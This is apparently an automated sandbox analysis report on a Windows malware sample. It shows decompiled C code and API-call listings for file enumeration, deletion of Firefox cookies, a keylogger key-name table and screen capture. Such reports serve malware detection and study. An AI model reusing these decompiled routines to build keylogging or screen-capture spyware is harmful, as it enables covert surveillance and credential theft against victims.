                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t100, _t100, "filefound", 0x415268, E0040EDD3( &_v160,  &_a4), 0x415268,  &_v48,  *_t149);
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						if((_t106 & 0xffffff00 | _t103 == 0xffffffff) != 0) {
                                          							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          							return 0;
                                          						}
                                          					}
                                          					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          				} while (FindNextFileW(_v12,  &_v768) != 0);
                                          				goto L10;
                                          			}


                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00415268,75949F40), ref: 00403198
                                          • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,00415268,75949F40), ref: 004031A7
                                          • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00415268,75949F40), ref: 004031B1
                                          • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00415268,75949F40), ref: 004031BB
                                          • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,004107BC,?), ref: 004031DE
                                          • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 004031E8
                                          • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 004031EF
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004031FB
                                          • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00403215
                                          • wcscmp.MSVCRT ref: 00403247
                                          • wcscmp.MSVCRT ref: 0040325F
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00403277
                                          • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00403286
                                          • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00403293
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040329E
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004032A7
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004032B6
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004032C5
                                            • Part of subcall function 00403183: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004032D5
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 004032E9
                                          • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?), ref: 004032F8
                                          • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00403302
                                          • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 0040330C
                                          • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00403324
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 0040334E
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00403358
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403364
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,filefound,00415268,00000000,00415268,?), ref: 00403393
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00415268,?), ref: 004033A0
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 004033B0
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 004033BA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004033D6
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004033DF
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004033E8
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004033F4
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403401
                                          • FindNextFileW.KERNEL32(000000FF,00000010), ref: 00403411
                                          • FindClose.KERNEL32(000000FF,?,?,?), ref: 00403422
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 0040342B
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00403434
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 0040343D
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040344F
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403458
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403461
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040346A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@std@@$D@2@@std@@$Hstd@@V?$basic_string@$??0?$basic_string@$?begin@?$basic_string@D@2@@0@FindV10@0@$FileG@2@@0@V01@@$?end@?$basic_string@D@1@@G@1@@NextV10@wcscmp$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@CloseFirstV01@V10@@V12@
                                          • String ID: filefound
                                          • API String ID: 3774306600-2220344067
                                          • Opcode ID: 3ecc530b8e2115a68d32aec42f0b266e75c394ab017ddb5da7d189f112df4d08
                                          • Instruction ID: 24ec99229332f1c5b72d1b304a02c10387bb8f3c273a52855c1da693c8ee490d
                                          • Opcode Fuzzy Hash: 3ecc530b8e2115a68d32aec42f0b266e75c394ab017ddb5da7d189f112df4d08
                                          • Instruction Fuzzy Hash: 9281E37190010EABCB14DFA0DC9D9DE7B7CFB15305F1081B6F516A21A0EF789A89CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,74B06490,00000000), ref: 00405B0D
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405B1A
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,?), ref: 00405B2C
                                          • getenv.MSVCRT ref: 00405B38
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 00405B44
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00405B50
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B59
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B62
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,004108F8,?), ref: 00405B7C
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 00405B86
                                          • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 00405B8D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00405B99
                                          • FindClose.KERNEL32(000000FF,?,?,?), ref: 00405BA7
                                          • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 00405BCC
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\cookies.sqlite,?,?,?), ref: 00405C6D
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\cookies.sqlite,?,?,?), ref: 00405C7A
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405C86
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405C8F
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405C98
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405CA1
                                          • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405CA8
                                          • GetLastError.KERNEL32(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405CB2
                                          • FindNextFileA.KERNEL32(000000FF,00000010,?,?,?), ref: 00405CC6
                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405CD4
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox cookies found, cleared!],?,?,?,?,00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405CEB
                                            • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,74B06490,?,00405E64), ref: 00403AAD
                                            • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,74B06490,?,00405E64), ref: 00403AC0
                                            • Part of subcall function 00403A9A: SetEvent.KERNEL32(00000000,?,00405E64), ref: 00403AC9
                                            • Part of subcall function 00403A9A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(74B06490,?,00405E64), ref: 00403AD8
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405D00
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405D09
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$Find$??0?$basic_string@D@1@@D@2@@0@FileHstd@@V01@V01@@V?$basic_string@$V10@$??4?$basic_string@?c_str@?$basic_string@CloseNextY?$basic_string@$DeleteErrorEventFirstLastV10@@getenv
                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                          • API String ID: 830200565-432212279
                                          • Opcode ID: 663ac35bb398fc1408d61a9e220494b6fd96e6e84e3f951f2a66223ea91a2ac9
                                          • Instruction ID: 9d0021f9074ca59868e7db579370f28baf2a5ec125cda6f041a2b5e7f9bf5000
                                          • Opcode Fuzzy Hash: 663ac35bb398fc1408d61a9e220494b6fd96e6e84e3f951f2a66223ea91a2ac9
                                          • Instruction Fuzzy Hash: 7F61903190410AAFDB00AFB0DC5D9EEBB78EF15314F104576E542E2190EE799ACACF98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,7313CB00,7313CB00), ref: 0040BCB1
                                          • FindFirstFileW.KERNEL32(00000000), ref: 0040BCB8
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,err_notopendir,00415268,?,00415268,00000000,?,?,?,?), ref: 0040BCEC
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040BCF9
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?), ref: 0040BD06
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BD25
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BD2E
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BD37
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?), ref: 0040BD10
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040BD4C
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,004107A8), ref: 0040BD65
                                          • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 0040BD6C
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040BD79
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 0040BD97
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040BDA1
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BDAA
                                          • FindNextFileW.KERNEL32(?,?), ref: 0040BDC0
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 0040BDD5
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 0040BDE4
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040BDF0
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BDF9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE02
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,fileslist,00415268,?,00415268,?), ref: 0040BE31
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,?), ref: 0040BE3E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 0040BE4B
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 0040BE55
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040BE6A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040BE73
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                            • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040BE85
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040BE8E
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040BE97
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$G@std@@$??0?$basic_string@G@2@@std@@V10@0@$D@1@@V01@@$?c_str@?$basic_string@$??4?$basic_string@?length@?$basic_string@FileFindV01@V10@@$??9std@@FirstG@1@@G@2@@0@Next
                                          • String ID: P)?$err_notopendir$fileslist
                                          • API String ID: 1112994111-4220216450
                                          • Opcode ID: 79c9baee2965a832a462d8af47ffc6020858f19acde58111eb033dc6fc779f9d
                                          • Instruction ID: 305903b0592b6c70fea0d48260eb7629651e495e35dfa161c8be6dc2ead5f216
                                          • Opcode Fuzzy Hash: 79c9baee2965a832a462d8af47ffc6020858f19acde58111eb033dc6fc779f9d
                                          • Instruction Fuzzy Hash: 7B51AE7290010EABCB04EBA0DD49DDE7B7CEF55305F044176F606E2190EF789A99CBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [F7] ,?,00000001,?,774273F0,?), ref: 00404677
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410854,?), ref: 00404C01
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410834,?,?,?,?,00000001), ref: 00404D53
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                          • String ID: [BckSp] $ [Del] $ [Down] $ [End] $ [Enter] $ [Esc] $ [F10] $ [F11] $ [F12] $ [F1] $ [F2] $ [F3] $ [F4] $ [F5] $ [F6] $ [F7] $ [F8] $ [F9] $ [Left] $ [PagDw] $ [PagUp] $ [Pause] $ [Print] $ [Right] $ [Start] $ [Tab] $ [Up] $s8@
                                          • API String ID: 4257247948-2145460947
                                          • Opcode ID: 6bbf6ec999e19eb7867b1fa4a36c1815a98bb4653b43f698e8fc3cbebbd7f826
                                          • Instruction ID: 6621d6dcba6f39f3780b877212494eafe7300683ab97f71c5a1edef2570af96d
                                          • Opcode Fuzzy Hash: 6bbf6ec999e19eb7867b1fa4a36c1815a98bb4653b43f698e8fc3cbebbd7f826
                                          • Instruction Fuzzy Hash: 3F32C4E2608009BBEB04B5ACC996DFF763DD6C1340B50096BEA02B31C5F97A994456EB
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 32%
                                          			E0040D71E(intOrPtr _a4) {
                                          				char _v5;
                                          				struct HDC__* _v12;
                                          				int _v16;
                                          				struct HBITMAP__* _v20;
                                          				struct HDC__* _v24;
                                          				intOrPtr _v30;
                                          				short _v32;
                                          				short _v34;
                                          				intOrPtr _v38;
                                          				char _v40;
                                          				char _v56;
                                          				char _v72;
                                          				signed int _v78;
                                          				signed int _v80;
                                          				long _v88;
                                          				long _v92;
                                          				void _v96;
                                          				void* _t86;
                                          				signed int _t92;
                                          				signed int _t93;
                                          				long _t105;
                                          				char* _t126;
                                          				signed int _t127;
                                          				struct HDC__* _t129;
                                          				signed short _t130;
                                          				void* _t131;
                                          				signed int _t133;
                                          				int _t154;
                                          				struct tagBITMAPINFO* _t155;
                                          
                                          				_t129 = CreateDCA("DISPLAY", 0, 0, 0);
                                          				_v24 = _t129;
                                          				_v12 = CreateCompatibleDC(_t129);
                                          				_v16 = GetDeviceCaps(_t129, 8);
                                          				_t154 = GetDeviceCaps(_t129, 0xa);
                                          				_t86 = CreateCompatibleBitmap(_t129, _v16, _t154);
                                          				_v20 = _t86;
                                          				if(_t86 != 0) {
                                          					_t7 =  &_v12; // 0x415940
                                          					if(SelectObject( *_t7, _t86) != 0) {
                                          						if(StretchBlt(_v12, 0, 0, _v16, _t154, _t129, 0, 0, _v16, _t154, 0xcc0020) != 0) {
                                          							if(GetObjectA(_v20, 0x18,  &_v96) != 0) {
                                          								_t92 = _v78 * _v80;
                                          								if(_t92 != 1) {
                                          									_t130 = 4;
                                          									if(_t92 <= _t130) {
                                          										goto L21;
                                          									} else {
                                          										_t130 = 8;
                                          										if(_t92 <= _t130) {
                                          											goto L21;
                                          										} else {
                                          											_t130 = 0x10;
                                          											if(_t92 <= _t130) {
                                          												goto L21;
                                          											} else {
                                          												if(_t92 > 0x18) {
                                          													_push(0x20);
                                          													goto L20;
                                          												} else {
                                          													_t130 = 0x18;
                                          													_push(0x28);
                                          												}
                                          											}
                                          										}
                                          									}
                                          								} else {
                                          									_push(1);
                                          									L20:
                                          									_pop(_t130);
                                          									L21:
                                          									_t93 = 1;
                                          									_push(0x28 + (_t93 << _t130) * 4);
                                          								}
                                          								_t155 = LocalAlloc(0x40, ??);
                                          								_t155->bmiHeader = 0x28;
                                          								_t155->bmiHeader.biWidth = _v92;
                                          								_t155->bmiHeader.biHeight = _v88;
                                          								_t155->bmiHeader.biPlanes = _v80;
                                          								_t155->bmiHeader.biBitCount = _v78;
                                          								if(_t130 < 0x18) {
                                          									_t127 = 1;
                                          									_t155->bmiHeader.biClrUsed = _t127 << _t130;
                                          								}
                                          								_t133 = 8;
                                          								asm("cdq");
                                          								_t155->bmiHeader.biCompression = 0;
                                          								_t155->bmiHeader.biClrImportant = 0;
                                          								_t105 = (_t155->bmiHeader.biWidth + 7) / _t133 * (_t130 & 0x0000ffff) * _t155->bmiHeader.biHeight;
                                          								_t155->bmiHeader.biSizeImage = _t105;
                                          								_t131 = GlobalAlloc(0, _t105);
                                          								if(_t131 != 0) {
                                          									if(GetDIBits(_v12, _v20, 0, _t155->bmiHeader.biHeight & 0x0000ffff, _t131, _t155, 0) != 0) {
                                          										_v40 = 0x4d42;
                                          										_v34 = 0;
                                          										_v32 = 0;
                                          										_v38 = _t155->bmiHeader.biSizeImage + _t155->bmiHeader.biClrUsed * 4 + _t155->bmiHeader + 0xe;
                                          										_v30 = _t155->bmiHeader + 0xe + _t155->bmiHeader.biClrUsed * 4;
                                          										__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
